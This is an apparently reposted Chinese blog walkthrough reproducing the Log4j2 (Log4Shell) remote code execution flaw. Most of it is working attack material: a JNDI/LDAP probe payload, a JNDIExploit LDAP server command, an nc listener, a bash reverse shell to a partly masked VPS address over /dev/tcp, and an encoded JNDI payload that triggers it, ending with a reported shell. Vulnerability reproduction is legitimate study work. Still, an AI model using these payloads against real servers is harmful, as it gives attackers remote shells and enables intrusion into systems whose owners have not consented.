Log4j2漏洞复现

本文转载自查看原文 2021-12-31 10:57 754 中间件安全

二、漏洞复现

可以使用相关的dnslog平台查看，也可以使用burp自带的dnslog进行查看，我这里使用的是 http://dnslog.cn/

${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显，说明存在该漏洞

1、首先起一个ldap服务，IP为接收shell的地址。

 java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 139.198.xx.xx

2、在VPS上开启NC监听

nc -lvvp 1000

3、使用bash命令反弹shell

bash -i >& /dev/tcp/139.198.xx.xx/1000 0>&1  //，这里需要先base64编码，然后再进行两次url编码。

${jndi:ldap://VPSIP:1389/TomcatBypass/Command/Base64/YmFzaCAtaSsfqwA%252BJiAvzkuMTk4LjEyNS45OSgas85OTk5IDA%252BJjE%253D}

成功反弹shell到我们的VPS上

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 LOG4j2 漏洞复现 log4j2漏洞复现 apache log4j2 漏洞复现linux【纯详版】 log4j2 漏洞解析记一次vulfocus靶场log4j2命令执行漏洞复现 springboot 解决log4j2漏洞 Log4j RCE漏洞复现 Log4j2 漏洞检测工具清单 apache log4j2 远程代码执行漏洞 Apache log4j2远程代码执行漏洞